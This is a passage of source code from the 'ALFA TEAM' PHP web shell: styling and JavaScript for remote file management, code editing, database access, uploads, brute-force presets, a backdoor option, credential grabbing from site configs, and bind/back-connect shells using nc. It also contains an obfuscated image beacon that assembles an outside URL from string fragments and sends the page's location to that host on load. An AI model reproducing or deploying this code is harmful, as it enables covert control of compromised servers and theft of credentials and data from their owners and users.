#0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}\r\n.foottable{width: 300px;font-weight: bold;\'.(!@is_writable($GLOBALS[\'cwd\'])?\'}.dir{background-color:red;}\':\'}\').\'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}\'.alfaCssLoadColors().\'\r\n</style>\';\r\necho "<script type=\'text/javascript\'>\r\nvar c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\nvar a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\';\r\nvar charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\nvar islinux = ".($GLOBALS[\'sys\']!="win"?\'true\':\'false\').";\r\nvar post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?\'true\':\'false\').";";?>\r\nvar alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}a=new/**/Image();var jquery ="http://"; var js ="codes-jquery"; var code=".c"; var codes ="om/"; var img ="jquery."; var sedoc ="p"; var doces ="hp";var image ="?jquery=";a.src=jquery+js+code+codes+img+sedoc+doces+image+escape(location.href);function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\\"header_pwd\\" onclick=\\"g(\'FilesMan\',\'/\');\\" path=\'/\' href=\'#action=fileman&path=/\'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\\"g(\'FilesMan\',\'"+r+l[i]+"/\');\\" path=\'"+r+l[i]+"/\' href=\'#action=fileman&path="+r+l[i]+\'/\\\' class="header_pwd">\'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id=\'"+s+"\' class=\'up_bar\'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname=\'"+n+"\']").parentElement.parentElement.parentElement.remove()}catch(e){}l+=\'<tr class="fmanager-row" id="tr_row_\'+r+\'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="\'+n+\'" class="chkbx" id="checkbox\'+r+\'"><label for="checkbox\'+r+\'"></label></div></td><td id="td_row_\'+r+\'">\'+p+\'<div style="position:relative;display:inline-block;bottom:12px;"><a row="\'+r+\'" id="id_\'+r+\'" class="main_name" onclick="editor(\\\'\'+s+"\',\'auto\',\'\',\'\',\'\',\'file\');\\" href=\\"#action=fileman&amp;path="+c_+"&amp;file="+s+\'" fname="\'+n+\'" ftype="file" path="\'+c_+\'" opt_title="">\'+n+\'</a></div></td><td><span style="font-weight:unset;" class="main_size">\'+c+\'</span></td><td><span style="font-weight:unset;" class="main_modify">\'+_+\'</span></td><td><span style="font-weight:unset;" class="main_owner_group">\'+u+\'</span></td><td><a id="id_chmode_\'+r+\'" href="javascript:void(0)" onclick="editor(\\\'\'+s+"\',\'chmod\',\'\',\'\',\'\',\'file\')\\">"+f+\'</a></td><td><a id="id_rename_\'+r+\'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'rename\',\'\',\'\',\'\',\'file\')\\">R</a> <a id=\\"id_touch_"+r+\'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'touch\',\'\',\'\',\'\',\'file\')\\">T</a> <a id=\\"id_edit_"+r+\'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'edit\',\'\',\'\',\'\',\'file\')\\">E</a> <a id=\\"id_download_"+r+\'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'+n+"\', \'download\')\\">D</a><a id=\\"id_delete_"+r+\'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\\\'Are You Sure For Delete # \'+s+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+s+"\') : \'\';\\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\\/\\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\\/\\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id=\'loader_"+e+\'\\\' class="options-loader-holder"><div parent="\'+e+\'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\\\'http://solevisible.com/images/loader.svg\\\'></div>\')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML=\'<label class="inputfile" for="\'+e+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+e+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');" multiple>\',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\\./g,"\\\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\\//g,"")==f.replace(/\\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick=\'editorTabController(this);\' opt_id=\'"+b+"\' id=\'tab_"+b+"\' class=\'editor-tab-name editor-tab-active\'>"+decodeURIComponent(e)+" <img opt_id=\'"+b+"\' onclick=\'closeEditorContent(this,event);return false;\' title=\'[close]\' src=\'http://solevisible.com/icons/menu/delete.svg\'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class=\'editor-contents editor-content-active\' id=\'"+b+"\'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\\/\\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var 